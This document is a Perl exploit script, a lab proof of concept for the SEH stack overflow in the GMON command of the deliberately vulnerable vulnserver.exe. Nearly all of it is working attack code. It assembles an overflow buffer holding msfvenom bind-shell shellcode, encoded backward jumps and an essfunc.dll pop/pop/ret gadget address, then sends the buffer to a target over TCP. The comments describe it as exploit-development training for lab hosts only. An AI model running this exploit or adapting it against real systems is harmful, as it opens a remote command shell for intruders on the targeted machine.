vulnserver.exe GMON
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
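# Lab proof-of-concept for the SEH-based stack overflow in the GMON command
# of vulnserver.exe (a deliberately vulnerable training binary).  Every
# constant below -- the padding offsets, the encoded jumps and the
# essfunc.dll gadget address -- comes from the author's own debugger session
# (see the "SEH chain" notes inline) and is only known to hold for that
# build and that VM.  Only run this against a lab host you own and control:
# the shellcode is a *bind* shell (windows/shell_bind_tcp), i.e. it leaves a
# listening command shell on the target that anyone who can reach the port
# can use (msfvenom's default LPORT was not overridden here, so presumably
# 4444 -- verify against how the payload was generated).
#
# Usage: perl gmon.pl [HOST [PORT]]   (defaults: 192.168.99.144 9999)

# Defaults carried over from the original script; overridable on the
# command line.
my $DEFAULT_HOST = '192.168.99.144';
my $DEFAULT_PORT = 9999;

# Assemble the complete GMON request and return it as a raw byte string
# (no trailing newline).  Layout after the 9-byte "GMON /.:/" header, with
# offsets relative to the first byte after the header:
#   padding1 (2914 bytes, offset    0)  filler before the shellcode
#   payload  ( 355 bytes, offset 2914)  encoded bind-shell shellcode
#   padding3 ( 120 bytes, offset 3269)  slack between shellcode and the back-jump
#   jmplong  ( 126 bytes, offset 3389)  encoded "JMP -517" back towards the
#                                       shellcode, followed by 82 bytes of filler
#   jmpshort (   4 bytes, offset 3515)  nSEH: short jump back into jmplong
#   seh      (   4 bytes, offset 3519)  SE handler: pop/pop/ret gadget in essfunc.dll
#   padding2 ( 473 bytes, offset 3523)  trailing filler
# The "Exact match at offset 3519" note below is the pattern-offset result
# for the SE handler field, which is what these sizes were tuned to.
sub build_message {
    my $header = "GMON /.:/";
    #SEH chain of thread 000041A8, item 0
    # Address=00FBFFDC
    # SE handler=45336E45
    #[*] Exact match at offset 3519
    my $padding1 = "A" x 2914;
    # Shellcode.  Encoded with only NUL excluded (-b "\x00"); if the target
    # turns out to mangle other bytes in GMON input, regenerate with a wider
    # bad-character list -- which bytes GMON tolerates is not recorded here.
    #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl
    #355 bytes
    my $payload =
    "\xda\xd5\xbd\xd4\x17\x90\x69\xd9\x74\x24\xf4\x5a\x31\xc9" .
    "\xb1\x53\x83\xc2\x04\x31\x6a\x13\x03\xbe\x04\x72\x9c\xc2" .
    "\xc3\xf0\x5f\x3a\x14\x95\xd6\xdf\x25\x95\x8d\x94\x16\x25" .
    "\xc5\xf8\x9a\xce\x8b\xe8\x29\xa2\x03\x1f\x99\x09\x72\x2e" .
    "\x1a\x21\x46\x31\x98\x38\x9b\x91\xa1\xf2\xee\xd0\xe6\xef" .
    "\x03\x80\xbf\x64\xb1\x34\xcb\x31\x0a\xbf\x87\xd4\x0a\x5c" .
    "\x5f\xd6\x3b\xf3\xeb\x81\x9b\xf2\x38\xba\x95\xec\x5d\x87" .
    "\x6c\x87\x96\x73\x6f\x41\xe7\x7c\xdc\xac\xc7\x8e\x1c\xe9" .
    "\xe0\x70\x6b\x03\x13\x0c\x6c\xd0\x69\xca\xf9\xc2\xca\x99" .
    "\x5a\x2e\xea\x4e\x3c\xa5\xe0\x3b\x4a\xe1\xe4\xba\x9f\x9a" .
    "\x11\x36\x1e\x4c\x90\x0c\x05\x48\xf8\xd7\x24\xc9\xa4\xb6" .
    "\x59\x09\x07\x66\xfc\x42\xaa\x73\x8d\x09\xa3\xb0\xbc\xb1" .
    "\x33\xdf\xb7\xc2\x01\x40\x6c\x4c\x2a\x09\xaa\x8b\x4d\x20" .
    "\x0a\x03\xb0\xcb\x6b\x0a\x77\x9f\x3b\x24\x5e\xa0\xd7\xb4" .
    "\x5f\x75\x4d\xbc\xc6\x26\x70\x41\xb8\x96\x34\xe9\x51\xfd" .
    "\xba\xd6\x42\xfe\x10\x7f\xea\x03\x9b\x6e\xb7\x8a\x7d\xfa" .
    "\x57\xdb\xd6\x92\x95\x38\xef\x05\xe5\x6a\x47\xa1\xae\x7c" .
    "\x50\xce\x2e\xab\xf6\x58\xa5\xb8\xc2\x79\xba\x94\x62\xee" .
    "\x2d\x62\xe3\x5d\xcf\x73\x2e\x35\x6c\xe1\xb5\xc5\xfb\x1a" .
    "\x62\x92\xac\xed\x7b\x76\x41\x57\xd2\x64\x98\x01\x1d\x2c" .
    "\x47\xf2\xa0\xad\x0a\x4e\x87\xbd\xd2\x4f\x83\xe9\x8a\x19" .
    "\x5d\x47\x6d\xf0\x2f\x31\x27\xaf\xf9\xd5\xbe\x83\x39\xa3" .
    "\xbe\xc9\xcf\x4b\x0e\xa4\x89\x74\xbf\x20\x1e\x0d\xdd\xd0" .
    "\xe1\xc4\x65\xe0\xab\x44\xcf\x69\x72\x1d\x4d\xf4\x85\xc8" .
    "\x92\x01\x06\xf8\x6a\xf6\x16\x89\x6f\xb2\x90\x62\x02\xab" .
    "\x74\x84\xb1\xcc\x5c";
    my $padding3 = "D" x 120;
    # Encoded long backward jump (the raw 5-byte JMP contains NULs, hence
    # the encoder pass); the 82 "C" bytes pad it out so that the short
    # jump below lands exactly on its first byte.
    #JMP -517
    #cat jmpfile.bin | msfvenom -a x86 --platform windows -f perl -b "\x00"
    my $jmplong =
    "\xb8\x31\x08\xfb\x31\xda\xc3\xd9\x74\x24\xf4\x5b\x31\xc9" .
    "\xb1\x05\x31\x43\x13\x83\xeb\xfc\x03\x43\x3e\xea\x0e\xe8" .
    "\xae\x33\x84\x2f\xda\x9d\xe5\xf1\x28\x8e\x18\x3c\xd2\x63" .
    "\x1b\x5e" .
    "C" x 82;
    # nSEH: EB 80 is "jmp short" with rel8 -128, measured from the end of
    # the 2-byte instruction, so execution lands 126 bytes before this
    # field -- the start of $jmplong (44 + 82 bytes).  The two 0x42 bytes
    # are never executed.
    #JMP -125
    my $jmpshort = "\xeb\x80\x42\x42";
    # SE handler: pop ebx; pop ebp; ret in essfunc.dll.  The ret lands on
    # nSEH (the 4 bytes just before this field), i.e. on $jmpshort.  Note
    # this is a hard-coded absolute address; it is only valid for the
    # essfunc.dll build the author debugged.
    #0x625010b4 pop ebx; pop ebp; ret
    #SEH chain of thread 000048C0, item 0
    # Address=00F3FFDC
    # SE handler=essfunc.625010B4
    my $seh = "\xb4\x10\x50\x62";
    my $padding2 = "C" x 473;
    my $message = $header . $padding1 . $payload . $padding3 . $jmplong . $jmpshort . $seh . $padding2;
    return $message;
}

# Deliver $message to $host:$port over a single TCP connection.  Dies on
# resolution, socket, connect, short-send or close failure.  $host may be a
# dotted quad or a name (inet_aton resolves names, which means a DNS lookup).
sub send_message {
    my ($host, $port, $message) = @_;
    my $target = inet_aton($host)
        or die "cannot resolve target host '$host'\n";
    my $portaddr = sockaddr_in($port, $target);
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
        or die "Can't create a socket $!\n";
    connect($sock, $portaddr)
        or die "Unable to connect to socket $!\n";
    # send() returns undef on error, otherwise the byte count; treat a
    # short send as a failure too, since a truncated request is useless.
    my $sent = send($sock, $message, 0);
    defined $sent && $sent == length $message
        or die "cannot send to $host($port): $!";
    close $sock or die "close: $!";
    return;
}

# Entry point: parse optional HOST and PORT, echo the raw request to STDOUT
# (original behaviour -- it is binary, redirect it if you want to inspect
# it), then fire it at the target.
sub run {
    my ($host, $port) = @ARGV;
    $host //= $DEFAULT_HOST;
    $port //= $DEFAULT_PORT;
    $port =~ /\A\d+\z/ && $port >= 1 && $port <= 65535
        or die "port must be an integer in 1..65535, got '$port'\n";
    my $message = build_message();
    print $message . "\r\n";
    send_message($host, $port, $message);
    return;
}

# Run only when executed directly; when required (e.g. by a test) the
# request can be built and inspected without touching the network.
run() unless caller;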